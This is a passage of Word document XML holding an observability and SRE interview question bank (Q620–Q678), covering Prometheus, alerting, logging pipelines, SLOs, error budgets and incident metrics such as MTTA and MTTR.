        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed tracing follows a request as it moves through multiple services. It helps identify latency bottlenecks, failed dependencies, and service interactions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Tracing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Q621. What is metric cardinality?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Metric cardinality is the number of unique time series created by metric labels. High cardinality can overload monitoring systems and increase cost.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Metric Cardinality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Q622. Explain Prometheus exporters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prometheus exporters expose metrics from systems that do not natively provide Prometheus-format metrics. Examples include node exporter, blackbox exporter, and database exporters.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Prometheus Exporters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Q623. What is node exporter?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Node exporter exposes Linux host metrics such as CPU, memory, disk, filesystem, and network usage for Prometheus scraping.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Node Exporter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Q624. Explain kube-state-metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-state-metrics exposes Kubernetes object state as Prometheus metrics. It reports information about deployments, pods, nodes, jobs, replicas, and resource requests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kube-state-metrics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Q625. What is Alertmanager?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alertmanager receives alerts from Prometheus and handles grouping, routing, silencing, inhibition, and notifications. It prevents duplicate alerts and routes incidents to the right responders.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Alertmanager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Q626. Explain alert routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alert routing sends alerts to the correct team or channel based on labels such as service, severity, environment, and ownership. Good routing reduces noise and speeds response.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Alert Routing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Q627. What is log aggregation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Log aggregation collects logs from many services and hosts into a central searchable system. It improves debugging, incident response, compliance, and trend analysis.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Log Aggregation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Q628. Explain centralized logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Centralized logging stores application, infrastructure, and audit logs in one managed platform. It enables search, correlation, retention policies, dashboards, and alerting.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Centralized Logging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Q629. What is correlation ID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A correlation ID is a unique identifier attached to a request and propagated across services. It helps connect logs, traces, and events for one user action or transaction.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Correlation Id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Q630. Explain RED metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RED metrics track Rate, Errors, and Duration for request-driven services. They are useful for service health, SLOs, and user-facing performance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Red Metrics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Q631. What is USE methodology?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The USE methodology checks Utilization, Saturation, and Errors for infrastructure resources. It is useful for diagnosing CPU, memory, disk, network, and other resource bottlenecks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Use Methodology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Q632. Explain SLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLI is a Service Level Indicator, a measurable signal of service reliability such as availability, latency, error rate, or freshness.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLI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Q633. What is SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLO is a Service Level Objective, a target value for an SLI over a time window. It defines what reliability level the team aims to provide.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLO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Q634. Explain SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLA is a Service Level Agreement, usually a formal contract with customers that defines reliability commitments and consequences if they are missed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLA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Q635. What is error budget?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An error budget is the allowed amount of unreliability within an SLO period. It helps balance release speed and reliability by guiding when to slow changes or improve stability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Error Budget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Q636. Explain golden signals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The four golden signals are latency, traffic, errors, and saturation. They provide a simple starting point for monitoring user-facing services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Golden Signals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Q637. What is blackbox monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blackbox monitoring checks a system from the outside, like a user would. It tests availability, latency, DNS, TLS, and endpoint behavior without relying on internal metrics.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Blackbox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Q638. Explain whitebox monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Whitebox monitoring uses internal metrics, logs, and application instrumentation. It provides detailed insight into system internals and failure causes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Whitebox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Q639. What is synthetic monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Synthetic monitoring runs scripted checks that simulate user journeys or API calls. It detects issues before real users notice them.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Synthetic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Q640. Explain tracing context propagation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain tracing context propagation. is an observability topic used to understand system health and user impact. A good answer should connect it to metrics, logs, traces, alerts, SLOs, ownership, and incident response.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tracing Context Propagation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Q641. What is Fluentd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fluentd is an open-source log collector and router. It collects logs from many sources, transforms them, and sends them to storage or analytics systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fluentd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Q642. Explain Fluent Bit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fluent Bit is a lightweight log and telemetry collector often used as a Kubernetes DaemonSet. It is efficient for shipping container logs to central systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fluent Bit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Q643. What is Filebeat?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Filebeat is an Elastic lightweight log shipper that forwards logs from files to Logstash, Elasticsearch, or other destinations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Filebeat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Q644. Explain Logstash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Logstash is an Elastic data processing pipeline that ingests, transforms, enriches, and routes logs and events.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Logstash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Q645. What is Kibana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kibana is Elastic’s visualization and exploration UI. It is used for searching logs, building dashboards, and analyzing data stored in Elasticsearch.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kibana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Q646. Explain retention policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Retention policies define how long logs, metrics, traces, backups, or artifacts are kept. They balance compliance, investigation needs, storage cost, and privacy requirements.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Retention Policies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Q647. What is log sampling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Log sampling stores a representative subset of logs to reduce volume and cost. It should preserve errors and important events while sampling high-volume routine logs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Log Sampling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Q648. Explain high-cardinality metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: High-cardinality metrics have labels with many unique values, such as user ID or request ID. They can make monitoring systems expensive or unstable and should be controlled carefully.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>High-cardinality Metrics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Q649. What is histogram metric?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A histogram metric samples observations into buckets and supports percentile approximation in systems like Prometheus. It is commonly used for latency and request size.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Histogram Metric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Q650. Explain summary metric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A summary metric calculates quantiles on the client side and exposes count and sum. It can be useful, but histograms are often preferred for aggregating across instances.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Summary Metric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Q651. What is PromQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: PromQL is the query language for Prometheus. It is used to calculate rates, aggregations, alerts, dashboards, and SLO burn-rate queries.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Promql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Q652. Explain Grafana dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grafana dashboards visualize metrics, logs, traces, and alerts in panels. Good dashboards focus on service health, user impact, dependencies, and actionable troubleshooting signals.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Grafana Dashboards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Q653. What is alert fatigue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alert fatigue happens when responders receive too many low-value or duplicate alerts. It causes missed incidents and burnout, so alerts should be actionable, owned, deduplicated, and tied to user impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Alert Fatigue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Q654. Explain alert tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alert tuning improves signal quality by adjusting thresholds, durations, severity, routing, grouping, and suppression. The goal is fewer, more actionable alerts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Alert Tuning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Q655. What is anomaly detection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Anomaly detection identifies unusual behavior compared with baselines or expected patterns. It is useful for capacity, fraud, performance, and incident detection but requires tuning to avoid noise.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Anomaly Detection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Q656. Explain observability in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability in Kubernetes collects metrics, logs, events, and traces from nodes, pods, containers, workloads, and the control plane. Common tools include Prometheus, Grafana, Loki, OpenTelemetry, and kube-state-metrics.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability In Kubernetes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Q657. What is application instrumentation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Application instrumentation adds code or agents to emit metrics, logs, and traces. It should capture request rates, errors, latency, dependencies, business events, and correlation IDs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Application Instrumentation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Q658. Explain APM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: APM, or Application Performance Monitoring, tracks application health, latency, errors, dependencies, traces, and user experience. It helps developers diagnose performance and reliability issues.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Apm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Q659. What is Datadog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Datadog is a SaaS observability and security platform for metrics, logs, traces, dashboards, alerts, APM, infrastructure monitoring, and cloud integrations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Datadog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Q660. Explain New Relic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: New Relic is an observability platform for APM, infrastructure, logs, browser monitoring, synthetics, and distributed tracing. It helps teams monitor software performance and reliability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>New Relic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Q661. What is Splunk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Splunk is a data analytics and observability platform often used for log search, security monitoring, dashboards, and incident investigation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Splunk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Q662. Explain distributed systems monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed systems monitoring tracks service health, dependencies, latency, errors, saturation, queues, data consistency, and failure propagation across many components.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Systems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Q663. What is tracing overhead?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tracing overhead is the extra CPU, memory, network, and storage cost caused by collecting traces. Sampling, efficient instrumentation, and careful attribute selection control the impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tracing Overhead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Q664. Explain service dependency mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Service dependency mapping shows how services communicate and depend on one another. It helps incident response, architecture reviews, impact analysis, and migration planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Service Dependency Mapping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Q665. What is incident detection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Incident detection identifies service degradation or failure using alerts, SLO burn rates, anomaly detection, logs, traces, synthetic checks, and user reports.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Incident Detection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Q666. Explain observability pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An observability pipeline collects, filters, enriches, samples, routes, and stores telemetry data. It helps control cost, protect sensitive data, and deliver the right signals to the right tools.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability Pipeline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Q667. What is OpenSearch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OpenSearch is an open-source search and analytics engine derived from Elasticsearch. It is used for log analytics, dashboards, and full-text search.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Opensearch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Q668. Explain metrics retention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Metrics retention defines how long time-series data is stored. Short retention supports real-time monitoring, while long-term retention supports trend analysis, capacity planning, and compliance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Metrics Retention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Q669. What is capacity monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Capacity monitoring tracks resource usage and growth trends to avoid saturation. It covers CPU, memory, storage, network, quotas, queues, and cloud service limits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Capacity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Q670. Explain performance baselining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Performance baselining establishes normal latency, throughput, error, and resource patterns. It helps detect anomalies and evaluate whether changes improved or degraded performance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Performance Baselining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Q671. What is dashboard sprawl?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dashboard sprawl occurs when too many dashboards exist without ownership or purpose. It causes confusion, so teams should standardize dashboards around services, SLOs, and incident workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dashboard Sprawl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Q672. Explain SRE monitoring strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SRE monitoring strategy focuses on user-impacting SLIs, SLOs, actionable alerts, golden signals, dependency visibility, runbooks, and continuous improvement after incidents.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SRE Monitoring Strategy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Q673. What is root cause analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Root cause analysis investigates what happened, why it happened, impact, contributing factors, and preventive actions. Good RCA is blameless and focuses on system improvements.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Root Cause Analysis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Q674. Explain MTTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTA, or Mean Time To Acknowledge, measures how long it takes for responders to acknowledge an alert or incident. Lower MTTA comes from good routing, ownership, and on-call readiness.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>MTTA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Q675. What is MTTR?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTR, or Mean Time To Recovery, measures how long it takes to restore service after an incident. Lower MTTR comes from strong observability, runbooks, rollback automation, on-call readiness, and clear incident command.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>MTTR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Q676. Explain monitoring anti-patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitoring anti-patterns include alerting on symptoms no one owns, static thresholds without context, too many dashboards, no runbooks, missing user-impact alerts, and ignoring high-cardinality cost.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Monitoring Anti-patterns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Q677. What is noise reduction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Noise reduction removes or suppresses low-value alerts and duplicate signals. It improves on-call health and allows responders to focus on real user impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Noise Reduction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Q678. Explain observability for ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
